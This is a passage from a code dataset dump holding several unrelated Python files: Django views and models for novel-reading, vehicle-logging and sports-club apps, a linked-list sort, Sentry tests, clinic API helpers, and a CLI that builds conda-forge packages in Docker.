text) is not None and flag == 2:\r\n data.append(text)\r\n print(data)\r\n flag -= 1\r\n self_url = f\"/list/novel{id}/section/section:{sec_num}/\"\r\n user = request.user\r\n if user.is_authenticated: # 将登录用户的阅读信息暂存在当前session中\r\n if not user.shelf.chapters: # 用户第一次阅读记录,此时数据库中还没有数据\r\n js = {}\r\n js[novel.id] = sec_num\r\n user.shelf.chapters = json.dumps(js)\r\n user.shelf.save()\r\n else:\r\n js = json.loads(user.shelf.chapters) # 将每一条阅读记录去重之后保存到数据库\r\n # 最多保存二十条数据\r\n if len(js)>20:\r\n for i in range(1,20):\r\n js.popitem()\r\n js[str(novel.id)] = sec_num # 字典自动去重的特性,阅读同一本书时,只能储存一个键值对\r\n user.shelf.chapters = json.dumps(js)\r\n 
user.shelf.save()\r\n print(user.shelf.chapters)\r\n\r\n if section.get(str(sec_num+1)) is None:\r\n next_url = self_url\r\n else:\r\n next_url = f\"/list/novel{id}/section/section:{sec_num+1}/\"\r\n if section.get(str(sec_num-1)) is None:\r\n last_url = self_url\r\n else:\r\n last_url = f\"/list/novel{id}/section/section:{sec_num-1}/\"\r\n return render(request, \"novel.html\", {\"data\": data,\"pg_len\":len(section),\"pg_num\":sec_num,\"last\":last_url,\"next\":next_url,\"novel_id\":id})\r\n\r\ndef down_load(request,id=0):\r\n novel = Novel.objects.get(pk=id)\r\n novel.heat.down_load = novel.heat.down_load +1\r\n file=open(novel.file,'rb')\r\n response =FileResponse(file)\r\n response['Content-Type']='APPLICATION/OCTET-STREAM'\r\n response['Content-Disposition'] =f'attachment;filename={id}.txt'\r\n response['Content-Length'] = os.path.getsize(novel.file) # 传输给客户端的文件大小\r\n novel.save()\r\n return response\r\n\r\n# def add_hot(request):\r\n# i = 1\r\n# novels = Novel.objects.all()\r\n# for novel in novels:\r\n# print(i)\r\n# click_num = random.randint(500, 2000)\r\n# download_num = random.randint(1, 200)\r\n# new_heat = Heat(read_num=click_num,down_load=download_num)\r\n# new_heat.save()\r\n# novel.heat = new_heat\r\n# novel.save()\r\n# i=i+1\r\n# return HttpResponse(request,\"aaaa
\")\r\n","sub_path":"Novel/apps/books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"514623188","text":"import os.path\nimport re\n\npattern = \"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\"\n\n\nfor d in list(filter(lambda dd: os.path.splitext(dd)[1] == \".log\",os.listdir(\"C:\\\\Users\\\\tanga2\\\\PycharmProjects\\\\OOP\\\\Test\"))):\n fo = open(\"C:\\\\Users\\\\tanga2\\\\PycharmProjects\\\\OOP\\\\Test\" + \"\\\\\" + d, 'r')\n for line in fo:\n if re.search(pattern,line):\n print(line)\n\n","sub_path":"Day 4/EmailFinding.py","file_name":"EmailFinding.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"140243597","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom club.models import SquadMember\nfrom fixtures.models import Fixture\n\n\nclass MatchReport(models.Model):\n fixture = models.ForeignKey(Fixture)\n author = models.ForeignKey(SquadMember)\n title = models.CharField(max_length=255, blank=True, null=True)\n report = models.TextField()\n created_date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n if self.title:\n return str(self.title)\n else:\n return 'No Title'\n\n\nclass Fine(models.Model):\n fixture = models.ForeignKey(Fixture, null=True, related_name='fines')\n recipient = models.ForeignKey(SquadMember)\n amount = models.IntegerField(default=50)\n reason = models.TextField(null=True)\n created_date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return \"%s (£%s)\" % (str(self.recipient), self.amount/100)\n\n\nclass Prematch(models.Model):\n fixture = models.ForeignKey(Fixture)\n author = models.ForeignKey(SquadMember)\n notes = models.TextField()\n created_date = models.DateTimeField(auto_now_add=True)\n theme = models.CharField(max_length=255, blank=True)\n beer = models.CharField(max_length=255, blank=True)\n\n def __str__(self):\n return str(self.fixture)\n","sub_path":"manager/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"378058830","text":"class No():\n def __init__(self, carga=None, nome=None, proximo=None):\n self.__carga = carga\n self.__nome = nome\n self.__proximo = proximo\n\n def getCarga(self):\n return self.__carga\n\n def getNome(self):\n return self.__nome\n\n def getProx(self):\n return self.__proximo\n\n def setProx(self, prox):\n self.__proximo = prox\n\n def __str__(self):\n return str(self.getCarga())\n def __repr__(self):\n return self.__str__()\n\n\nclass ListaEncadeada():\n def __init__(self):\n self.__inicio=None\n self.__final=None\n self.__tamanho=0\n self.__lista_auxiliar=[]\n\n def getInicio(self):\n if(self.__tamanho == 0):\n return 0\n else:\n return self.__inicio\n\n def getFinal(self):\n return self.__final\n \n def getTamanho(self):\n return self.__tamanho\n\n def insertion_sort(self):\n if(self.getTamanho() > 1):\n ref = self.__inicio\n current = ref\n while current.getProx() != None:\n if(current.getProx().getCarga() > current.getCarga()):\n current = current.getProx()\n elif(current.getProx().getCarga() == current.getCarga()):\n\n name1=str(ref.getNome())\n name2=str(temp.getNome())\n if(name1[0:2] > name2[0:2]):\n temp.setProx(ref)\n self.__inicio = temp\n ref = self.__inicio\n else:\n inpos = ref\n while temp.getCarga() > inpos.getProx().getCarga():\n inpos = inpos.getProx()\n temp.setProx(inpos.getProx())\n inpos.setProx(temp) \n else:\n temp = current.getProx()\n current.setProx(temp.getProx())\n if(ref.getCarga() > temp.getCarga()):\n temp.setProx(ref)\n self.__inicio = temp\n ref = self.__inicio\n else:\n inpos = ref\n while temp.getCarga() > inpos.getProx().getCarga():\n inpos = inpos.getProx()\n temp.setProx(inpos.getProx())\n inpos.setProx(temp) \n\n \n def inserir(self,carga,nome):\n temp = No(carga,nome)\n self.__tamanho+=1\n\n if(self.__inicio == None):\n self.__inicio = temp\n self.__final = temp\n else:\n self.__final.setProx(temp)\n temp.setProx(None)\n self.__final=temp\n\n self.__lista_auxiliar.append(temp)\n\n def printar(self):\n m=self.getInicio()\n for y in range(self.getTamanho()):\n print(m.getNome())\n m=m.getProx()\n\n\npremium=ListaEncadeada()\ndiamante=ListaEncadeada()\nouro=ListaEncadeada()\nprata=ListaEncadeada()\nbronze=ListaEncadeada()\nresto=ListaEncadeada()\n\nQtdPacientes=int(input())\nfor x in range(QtdPacientes):\n dados=input().split()\n if(dados[1] == \"premium\"):\n premium.inserir(int(dados[2]),dados[0])\n elif(dados[1] == \"diamante\"):\n diamante.inserir(int(dados[2]),dados[0])\n elif(dados[1] == \"ouro\"):\n ouro.inserir(int(dados[2]),dados[0])\n elif(dados[1] == \"prata\"):\n prata.inserir(int(dados[2]),dados[0])\n elif(dados[1] == \"bronze\"):\n bronze.inserir(int(dados[2]),dados[0])\n else:\n resto.inserir(int(dados[2]),dados[0])\n\npremium.insertion_sort()\ndiamante.insertion_sort()\nouro.insertion_sort()\nprata.insertion_sort()\nbronze.insertion_sort()\nresto.insertion_sort()\n\npremium.printar()\ndiamante.printar()\nouro.printar()\nprata.printar()\nbronze.printar()\nresto.printar()\n","sub_path":"UFRPE/Fundamentos de Problemas Computacionais SI2/Hospital/hospital.py","file_name":"hospital.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"440966443","text":"from django.shortcuts import render,get_object_or_404,redirect\nfrom django.http import request\nfrom .models import regvehicle,entries,vehicle,wanttobe\nimport smtplib\nfrom django.core.mail import send_mail\n# Create your views here.\ndef homeview(request):\n vehicles=regvehicle.objects.all()\n entry=entries.objects.all()\n return render(request,'vehiclelog/homeview.html',{'vehicles':vehicles,'entries':entry})\n\ndef searchveh(request):\n if request.method==\"POST\":\n vehiclen=request.POST['vehicleno']\n regveh=vehicle.objects.filter(vehicle_no=vehiclen).first()\n if regveh:\n entry=entries() \n entry.vehicleno=regveh\n entry.save()\n if 'checkbox' in request.POST:\n if regveh.exit_or_enter==1:\n error=\"Person is already inside\"\n return render(request,'vehiclelog/error.html',{'error':error})\n regveh.exit_or_enter=1;\n regveh.save()\n lastentries=entries.objects.filter(vehicleno=regveh).all()\n sucess_msg=\"The entry is added\"\n return render(request,'vehiclelog/search.html',{'sucess':sucess_msg,'entries':lastentries})\n else:\n return render(request,'vehiclelog/save.html') \n return render(request,'vehiclelog/search.html',)\n\n\ndef saveentry(request):\n if request.method==\"POST\":\n vehiclen=request.POST['vehno']\n Vehicle=vehicle()\n Vehicle.owner =request.POST['name']\n Vehicle.contact=request.POST['email']\n Vehicle.vehicle_no=request.POST['vehno']\n Vehicle.reg_checker=1;\n Vehicle.exit_or_enter=1;\n Vehicle.save() \n unreg=wanttobe()\n unreg.veh_no=Vehicle\n unreg.purpose=request.POST['purpose']\n unreg.save()\n if wanttobe.objects.all().count() > 10 :\n send_mail(\n 'To cheif Security sir',\n 'Please check the mail list because there are many people are waiting for it' ,\n 'as931818@student.nitw.ac.in',\n ['singh12.7@gmail.com'],\n )\n entry=entries()\n entry.vehicleno=Vehicle\n entry.save()\n # send_mail(\n # 'Kya ho gya',\n # 'Main tumhe bhej rha hu',\n # 'chsaiteja@student.nitw.ac.in',\n # ['singh12.7@gmail.com'],\n # )\n return redirect('homeview')\n return render(request,'vehiclelog/save.html') \n\n\n\n","sub_path":"vehicletrack/vehiclelog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"97711216","text":"from django.urls import path, include\nfrom gatewayb.views import api_manager\nfrom manager import views\n\n\nurlpatterns = [\n path('accounts/', views.AccountList.as_view(), name='account-list'),\n path('accounts//', views.AccountDetail.as_view(), name='account-detail'),\n path('orders/', views.OrderList.as_view(), name='order-list'),\n path('orders//', views.OrderDetail.as_view(), name='order-list'),\n path('websocket/index/', views.index, name='websocket-index'),\n path('', api_manager, name='api_manager'),\n]\n","sub_path":"manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"196360983","text":"from __future__ import absolute_import\n\nfrom django.core import mail\n\nfrom sentry.models import Activity, Release\nfrom sentry.testutils import TestCase\n\n\nclass SendNotificationTest(TestCase):\n def test_note(self):\n user_foo = self.create_user('foo@example.com')\n\n activity = Activity.objects.create(\n project=self.project,\n group=self.group,\n type=Activity.NOTE,\n user=user_foo,\n event=self.create_event('a' * 32, group=self.group),\n data={\n 'text': 'sup guise',\n },\n )\n\n self.project.team.organization.member_set.create(user=user_foo)\n\n with self.tasks():\n activity.send_notification()\n\n assert len(mail.outbox) == 1\n\n msg = mail.outbox[0]\n\n assert msg.subject == 'Re: [Sentry] [foo Bar] ERROR: Foo bar'\n assert msg.to == [self.user.email]\n\n def test_release(self):\n user_foo = self.create_user('foo@example.com')\n\n release = Release.objects.create(\n project=self.project,\n version='a' * 40,\n )\n\n activity = Activity.objects.create(\n project=self.project,\n type=Activity.RELEASE,\n user=user_foo,\n event=self.create_event('a' * 32, group=self.group),\n data={\n 'version': release.version,\n },\n )\n\n self.project.team.organization.member_set.create(user=user_foo)\n\n with self.tasks():\n activity.send_notification()\n\n assert len(mail.outbox) == 1\n\n msg = mail.outbox[0]\n\n assert msg.subject == '[Sentry] Release %s' % (release.version,)\n assert msg.to == [self.user.email]\n","sub_path":"tests/sentry/models/activity/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"286385341","text":"\nimport json\nimport logging.config\n\nfrom email_api import app, SETTINGS_FILE\n\ndef main():\n with open(SETTINGS_FILE, 'r') as fhandler:\n data = json.load(fhandler)\n logging.config.dictConfig(data['logging_dict'])\n app.run(data['host'], data['port'])\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"email/runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"518319199","text":"import requests\nimport json\nfrom Common import common\nfrom DB import DB\n\nheaders = common.headers\n\n\ndef create_desk(code):\n url = \"https://test.igancao.cn:8000/gateway/base/desk/create\"\n data = {\n \"code\": code,\n \"title\": \"科室\" + str(code)\n }\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef update_desk(code, id):\n url = \"https://test.igancao.cn:8000/gateway/base/desk/update\"\n data = {\n \"code\": code,\n \"title\": \"科室\" + str(code),\n \"id\": id\n }\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef disable_desk(id, enable):\n url = \"https://test.igancao.cn:8000/gateway/base/desk/disable\"\n data = {\n \"id\": id,\n \"enable\": enable\n }\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef create_room(code, deskid):\n url = \"https://test.igancao.cn:8000/gateway/base/room/create\"\n data = {\n \"code\": code,\n \"title\": \"诊室\" + str(code),\n \"remark\": \"sd\",\n \"deskId\": deskid\n }\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef update_room(code, roomid):\n url = \"https://test.igancao.cn:8000/gateway/base/room/update\"\n data = {\n \"code\": code,\n \"title\": \"修改诊室\" + str(code),\n \"id\": roomid,\n \"remark\": \"\\\"修改诊室\\\"\"}\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef disable_room(roomid, enable):\n url = \"https://test.igancao.cn:8000/gateway/base/room/disable\"\n data = {\n \"id\": roomid,\n \"enable\": enable\n }\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef query_deskid(code):\n query_deskid_sql = \"select id from gd_default.base_desk where code = '%s'\" % code\n result, results = DB.exe_sql(query_deskid_sql)\n return result, results\n\n\ndef query_roomid(code):\n query_roomid_sql = \"select id from gd_default.base_room where code = '%s'\" % code\n result, results = DB.exe_sql(query_roomid_sql)\n return result, results\n\n","sub_path":"GancaoSaas-Interface/ZhensuoManage/deskdata.py","file_name":"deskdata.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"120408265","text":"\"\"\"Scourge of the open sources\n\"\"\"\n\nimport concurrent.futures\nimport contextlib\nimport functools\nimport glob\nimport heapq\nimport itertools\nimport operator\nimport os\nimport pickle\nimport shutil\nimport tempfile\nimport threading\nimport time\n\nfrom multiprocessing import cpu_count\n\nimport click\nimport decorating\nimport networkx as nx\nimport sh\nimport toolz\nimport tqdm\nimport yaml\n\nfrom github import Github\n\nimport conda.api\n\nfrom diskcache import Cache\n\nfrom conda_build.metadata import MetaData\n\nfrom conda.resolve import MatchSpec\n\nfrom conda_build_all.version_matrix import special_case_version_matrix\n\n\nmemoize = functools.partial(\n toolz.memoize,\n cache=Cache(os.path.join(tempfile.gettempdir(), 'scourge'))\n)\n\n\nGH = Github(\n os.environ.get('GITHUB_USER', None),\n os.environ.get('GITHUB_ACCESS_TOKEN', None)\n)\n\n\n@contextlib.contextmanager\ndef pool(sequence, klass, max_workers=None):\n if max_workers is None:\n # Use at most half the number of CPUs available\n max_workers = max(1, min(cpu_count() // 2, len(sequence)))\n with klass(max_workers=max_workers) as e:\n yield e\n\n\n@contextlib.contextmanager\ndef thread_pool(sequence, max_workers=None):\n with pool(\n sequence,\n concurrent.futures.ThreadPoolExecutor,\n max_workers=max_workers,\n ) as e:\n yield e\n\n\n@contextlib.contextmanager\ndef process_pool(sequence, max_workers=None):\n with pool(\n sequence,\n concurrent.futures.ProcessPoolExecutor,\n max_workers=max_workers,\n ) as e:\n yield e\n\n\n@click.group(context_settings=dict(help_option_names=['-h', '--help']))\ndef cli():\n pass\n\n\ndef parse_git_version_spec(ctx, param, packages):\n package_specifications = {}\n for package in packages:\n package, *version = package.split('@', 1)\n package_specifications[package] = version[0] if version else None\n return package_specifications\n\n\ndef modify_metadata(meta, version, deps_to_build):\n if version is None:\n return meta\n\n *_, owner, name = meta.get_value('about/home').rsplit('/', 2)\n repo = GH.get_repo('{}/{}'.format(owner, name))\n raw_tag = get_latestrel(repo, sha=False)\n commit_count = get_count(repo, raw_tag, get_sha(repo, 'master'))\n simple_tag = raw_tag.rsplit('-', 1)[-1].replace('v', '')\n meta.meta['package']['version'] = '{}+{}.nightly'.format(\n simple_tag, commit_count\n )\n meta.meta['source'] = {\n 'git_url': meta.get_value('about/home'),\n 'git_rev': version,\n }\n requirements = meta.meta['requirements']\n build = requirements['build']\n run = requirements['run']\n\n if deps_to_build:\n for i, dep in enumerate(build):\n name, *_ = dep.split()\n if name in deps_to_build:\n meta.meta['requirements']['build'][i] = name\n\n for i, dep in enumerate(run):\n name, *_ = dep.split()\n if name in deps_to_build:\n meta.meta['requirements']['run'][i] = name\n\n return meta\n\n\ndef construct_dependency_subgraph(metadata):\n graph = {package: set() for package in metadata.keys()}\n\n for package, meta in metadata.items():\n requirements = frozenset(\n meta.get_value('requirements/build') +\n meta.get_value('requirements/run')\n )\n for dep in requirements:\n dep_name, *_ = dep.split()\n if dep_name in graph and dep_name != package:\n graph[package].add(dep_name)\n return graph\n\n\ndef get_sha(repo, ref):\n return repo.get_git_ref('heads/{}'.format(ref)).object.sha\n\n\n@cli.command(help='Get the sha of a GitHub repo ref without using git locally')\n@click.argument('repo', callback=lambda ctx, param, value: 
GH.get_repo(value))\n@click.argument('ref')\ndef sha(repo, ref):\n click.echo(get_sha(repo, ref))\n\n\n@memoize(key=lambda args, kwargs: (args[0].full_name, args[1], args[2]))\ndef get_count(repo, tag, sha):\n return repo.compare(tag, sha).total_commits\n\n\n@cli.command(help='Number of commits between tag and ref')\n@click.argument('repo', callback=lambda ctx, param, value: GH.get_repo(value))\n@click.argument('tag')\n@click.argument('ref', required=False, default='master')\ndef count(repo, tag, ref):\n click.echo(get_count(repo, tag, get_sha(repo, ref)))\n\n\n@memoize(key=lambda args, kwargs: (args[0].full_name, args[1][1]))\ndef tag_sort_key(repo, pair):\n _, sha = pair\n return repo.get_commit(sha).commit.committer.date\n\n\ndef get_latestrel(repo, sha):\n key = functools.partial(tag_sort_key, repo)\n tags = [(rel.name, rel.commit.sha) for rel in repo.get_tags()]\n (name, commit), = heapq.nlargest(1, tags, key=key)\n return commit if sha else name\n\n\n@cli.command(help='Latest release')\n@click.argument('repo', callback=lambda ctx, param, value: GH.get_repo(value))\n@click.option('-s/-n', '--sha/--name')\ndef latestrel(repo, sha):\n click.echo(get_latestrel(repo, sha))\n\n\ndef parse_package_branch(ctx, param, values):\n branches = {}\n\n for value in values:\n try:\n package, branch = value.split(':')\n except Exception as e:\n raise click.ClickException(str(e))\n branches[package] = branch\n\n return branches\n\n\ndef clone_and_checkout(url, branch=None, timeout=10): # 10 second timeout\n path = url.rsplit('/')[-1]\n sh.git.clone(url, path)\n\n sleep_interval = 0.05\n duration = 0\n\n while not os.path.exists(path) and duration <= timeout:\n time.sleep(sleep_interval)\n duration += sleep_interval\n\n if not os.path.exists(path):\n raise click.ClickException('Unable to clone {}'.format(url))\n\n if branch is not None:\n with sh.pushd(path):\n sh.git.checkout(branch)\n\n\n@cli.command(help='Pull in the conda forge docker image and clone feedstocks.')\n@click.argument(\n 'package_specifications', callback=parse_git_version_spec, nargs=-1)\n@click.option(\n '-i',\n '--image', required=False, default='condaforge/linux-anvil',\n help='The Docker image to use to build packages.'\n)\n@click.option(\n '-a', '--artifact-directory',\n default=os.path.join('.', 'artifacts'),\n type=click.Path(),\n help='The location to place tarballs upon a successful build.',\n)\n@click.option(\n '-r',\n '--recipe-branch',\n required=False,\n default={},\n callback=parse_package_branch,\n multiple=True,\n help='The conda-forge recipe branch to use for building a package.'\n)\n@click.option(\n '-t', '--recipe-clone-timeout',\n type=int,\n default=10,\n help='Wait this long before failing when cloning recipes',\n)\ndef init(package_specifications,\n image,\n artifact_directory,\n recipe_branch,\n recipe_clone_timeout):\n try:\n sh.docker.pull(image, _out=click.get_binary_stream('stdout'))\n except sh.ErrorReturnCode as e:\n try:\n result = sh.docker.images(image, quiet=True).splitlines()\n except sh.ErrorReturnCode as e2:\n click.get_binary_stream('stderr').write(e2.stderr)\n raise SystemExit(e2.exit_code)\n else:\n if not result:\n click.get_binary_stream('stderr').write(e.stderr)\n raise SystemExit(e.exit_code)\n\n feedstocks = [\n 'https://github.com/conda-forge/{}'.format(feedstock)\n for feedstock in map('{}-feedstock'.format, package_specifications)\n if not os.path.exists(feedstock)\n ]\n\n if feedstocks:\n progress = functools.partial(\n tqdm.tqdm,\n total=len(feedstocks),\n desc='Cloning feedstocks'\n 
)\n else:\n progress = iter\n\n with thread_pool(package_specifications) as executor:\n futures = [\n executor.submit(\n clone_and_checkout,\n feedstock,\n recipe_branch.get(spec, None),\n timeout=recipe_clone_timeout,\n ) for feedstock, spec in zip(feedstocks, package_specifications)\n ]\n\n for future in progress(concurrent.futures.as_completed(futures)):\n try:\n future.result()\n except sh.ErrorReturnCode as e:\n click.get_binary_stream('stderr').write(e.stderr)\n raise SystemExit(e.exit_code)\n\n packages = tuple(package_specifications.keys())\n\n recipes_directory = os.path.join('.', 'recipes')\n shutil.rmtree(recipes_directory, ignore_errors=True)\n\n os.makedirs(recipes_directory, exist_ok=True)\n os.makedirs(artifact_directory, exist_ok=True)\n\n recipe_paths = []\n\n for package in packages:\n package_recipe_directory = os.path.join(recipes_directory, package)\n recipe_path = os.path.join('{}-feedstock'.format(package), 'recipe')\n shutil.copytree(recipe_path, package_recipe_directory)\n recipe_paths.append(recipe_path)\n\n with process_pool(packages) as executor:\n package_metadata = dict(\n zip(packages, executor.map(MetaData, recipe_paths))\n )\n\n graph = construct_dependency_subgraph(package_metadata)\n\n metadata = {\n package: modify_metadata(meta, version, graph[package])\n for meta, (package, version) in zip(\n package_metadata.values(), package_specifications.items()\n )\n }\n\n with open('.artifactdir', mode='wt') as f:\n f.write(os.path.abspath(artifact_directory))\n\n with open('.recipedir', mode='wt') as f:\n f.write(os.path.abspath(recipes_directory))\n\n with open('.metadata', mode='wb') as f:\n pickle.dump(metadata, f)\n\n nx_graph = nx.DiGraph()\n for node, edges in graph.items():\n nx_graph.add_node(node)\n for edge in edges:\n nx_graph.add_edge(edge, node)\n ordering = list(nx.topological_sort(nx_graph))\n\n with open('.ordering', mode='wb') as f:\n pickle.dump(ordering, f)\n\n\ndef get_tarballs(artifacts):\n pattern = os.path.join(artifacts, 'linux-64', '*.tar.bz2')\n return [\n tarball for tarball in glob.glob(pattern)\n if not os.path.basename(tarball).startswith('repodata')\n ]\n\n\n@cli.command(help='List tarballs')\n@click.argument(\n 'artifact_directory',\n required=False,\n default=os.path.join('.', 'artifacts')\n)\ndef tarballs(artifact_directory):\n result = get_tarballs(artifact_directory)\n if result:\n click.echo('\\n'.join(result))\n\n\n@cli.command(help='Remove feedstocks and generated files')\ndef clean():\n if os.path.exists('.artifactdir'):\n with open('.artifactdir', mode='rt') as f:\n artifact_directory = f.read().strip()\n\n if glob.glob(os.path.join(artifact_directory, '*')):\n try:\n sh.docker.run(\n '-a', 'stdin',\n '-a', 'stdout',\n '-a', 'stderr',\n '-v', '{}:/artifacts'.format(artifact_directory),\n '-i',\n '--rm',\n '-e', 'HOST_USER_ID={:d}'.format(os.getuid()),\n 'condaforge/linux-anvil',\n 'bash',\n _in='rm -rf /artifacts/*; rm -rf /package_cache/*',\n )\n except sh.ErrorReturnCode as e:\n click.get_binary_stream('stderr').write(e.stderr)\n\n files = [path for path in os.listdir(path='.')]\n\n if files:\n with thread_pool(files) as executor:\n futures = [\n executor.submit(\n functools.partial(shutil.rmtree, ignore_errors=True)\n if os.path.isdir(path) else os.remove,\n path\n ) for path in files\n ]\n\n for future in concurrent.futures.as_completed(futures):\n try:\n future.result()\n except Exception as e:\n click.ClickException(str(e))\n\n\nSCRIPT = '\\n'.join([\n 'conda config --add pkgs_dirs /package_cache',\n 'conda clean 
--lock',\n 'conda install --yes --quiet conda-forge-build-setup',\n 'source run_conda_forge_build_setup',\n (\n 'CONDA_PY={python} CONDA_NPY={numpy} '\n 'conda build /recipes/{package} --channel file:///artifacts '\n '--output-folder /artifacts --quiet || exit 1'\n ),\n])\n\n\ndef update_animation(\n animation,\n formatter,\n built,\n future,\n lock=threading.Lock(),\n):\n with lock:\n animation.spinner.message = formatter(next(built))\n\n\ndef empty_padding(*args, **kwargs):\n \"\"\"Don't show the default sine wave when animating.\"\"\"\n return ''\n\n\nanimated = functools.partial(decorating.animated, fpadding=empty_padding)\n\n\ndef construct_environment_variables(ctx, param, environment):\n result = {}\n for package, var in (x.split(':', 1) for x in environment):\n result.setdefault(package, set()).add(var)\n return result\n\n\n@cli.command(help='Build conda forge packages in parallel')\n@click.option(\n '-c', '--constraints',\n multiple=True,\n help='Additional special software constraints - e.g., numpy/python.'\n)\n@click.option(\n '-e', '--environment',\n multiple=True,\n callback=construct_environment_variables,\n help='Additional environment variables to pass to builds',\n)\n@click.option(\n '-j', '--jobs',\n type=int,\n default=max(1, cpu_count() // 2),\n help='Number of workers to use for building',\n)\ndef build(constraints, jobs, environment):\n with open('.metadata', mode='rb') as f:\n metadata = pickle.load(f)\n\n if not environment.keys() <= metadata.keys():\n missing_packages = environment.keys() - metadata.keys()\n raise click.ClickException(\n 'Environment variables defined for missing packages {}'.format(\n set(missing_packages)\n )\n )\n\n # modify metadata to propagate envars\n for key, values in environment.items():\n for var in values:\n name, _ = var.split('=', 1)\n metadata[key].meta['build'].setdefault('script_env', []).append(\n name\n )\n\n with open('.recipedir', mode='rt') as f:\n recipes_directory = f.read().strip()\n\n for package, meta in metadata.items():\n path = os.path.join(recipes_directory, package, 'meta.yaml')\n with open(path, mode='wt') as f:\n yaml.dump(meta.meta, f, default_flow_style=False)\n\n if not constraints:\n constraints = 'python >=2.7,<3|>=3.4', 'numpy >=1.10', 'r-base >=3.3.2'\n\n constraint_specifications = {\n key.name: value for key, value in zip(\n *itertools.tee(map(MatchSpec, constraints))\n )\n }\n\n raw_index = conda.api.get_index(\n ('defaults', 'conda-forge'),\n platform='linux-64',\n )\n\n index = {\n dist: record for dist, record in raw_index.items()\n if dist.name not in constraint_specifications or (\n dist.name in constraint_specifications and\n constraint_specifications[dist.name].match(dist)\n )\n }\n\n get_version_matrix = toolz.flip(special_case_version_matrix)(index)\n\n with open('.artifactdir', mode='rt') as f:\n artifact_directory = f.read().strip()\n\n with animated('Constraining special versions (e.g., numpy and python)'):\n with process_pool(metadata) as executor:\n results = executor.map(get_version_matrix, metadata.values())\n\n matrices = dict(zip(metadata.keys(), results))\n\n package_cache_dir = tempfile.TemporaryDirectory(prefix='scourge.build.')\n package_cache = package_cache_dir.name\n\n scripts = {\n (\n package,\n constraints.get('python', '').replace('.', ''),\n constraints.get('numpy', '').replace('.', ''),\n ): SCRIPT.format(\n package=package,\n python=constraints.get('python', '').replace('.', ''),\n numpy=constraints.get('numpy', '').replace('.', ''),\n package_cache=package_cache,\n )\n for 
package, matrix in matrices.items()\n for constraints in map(dict, matrix)\n }\n\n os.makedirs('logs', exist_ok=True)\n for text_file in glob.glob(os.path.join('logs', '*.txt')):\n os.remove(text_file)\n\n args = (\n '-a', 'stdin',\n '-a', 'stdout',\n '-a', 'stderr',\n '-v', '{}:/artifacts'.format(os.path.abspath(artifact_directory)),\n '-v', '{}:/recipes'.format(os.path.abspath(recipes_directory)),\n '-v', '{}:/package_cache'.format(package_cache),\n '--dns', '8.8.8.8',\n '--dns', '8.8.4.4',\n '-e', 'HOST_USER_ID={:d}'.format(os.getuid()),\n )\n\n tasks = {package: [] for package in matrices.keys()}\n\n for (package, python, numpy), script in scripts.items():\n task_args = functools.reduce(\n lambda args, var: args + ('-e', var),\n environment.get(package, ()),\n args,\n )\n log_path = os.path.join(\n 'logs', '{package}-py{python}-np{numpy}.txt'.format(\n package=package,\n python=python or '_none',\n numpy=numpy or '_none',\n )\n )\n task = sh.docker.run.bake(\n *task_args,\n interactive=True,\n rm=True,\n _in=script,\n _out=log_path,\n _err_to_out=True,\n )\n tasks[package].append((task, python, numpy))\n\n all_tasks = list(itertools.chain.from_iterable(tasks.values()))\n ntasks = len(all_tasks)\n built = itertools.count()\n first = next(built)\n format_string = 'Built {{:{padding}d}}/{:{padding}d} packages'\n formatter = format_string.format(ntasks, padding=len(str(ntasks))).format\n animation = animated(formatter(first))\n\n with open('.ordering', mode='rb') as f:\n ordering = pickle.load(f)\n\n errors = {}\n with animation:\n update_when_done = functools.partial(\n update_animation,\n animation,\n formatter,\n built,\n )\n\n with thread_pool(all_tasks, max_workers=jobs) as executor:\n for package in ordering: # TODO: parallelize on special versions\n futures = {}\n\n for task, python, numpy in tasks[package]:\n future = executor.submit(\n task, 'condaforge/linux-anvil', 'bash'\n )\n future.add_done_callback(update_when_done)\n futures[future] = (package, python, numpy)\n\n for future in concurrent.futures.as_completed(futures.keys()):\n try:\n future.result()\n except Exception as e:\n failed_package = futures[future]\n errors[failed_package] = '{}: {}'.format(\n '-'.join(filter(None, failed_package)),\n str(e)\n )\n if errors:\n path = os.path.join('logs', 'errors.txt')\n formatted_error_message = format_errors(errors)\n with open(path, mode='w') as f:\n f.write(formatted_error_message)\n raise click.ClickException(\n 'Errors during build. See logs dir for details:\\n{}'.format(\n formatted_error_message\n )\n )\n\n\ndef format_errors(errors):\n key_names = '', 'python', 'numpy'\n 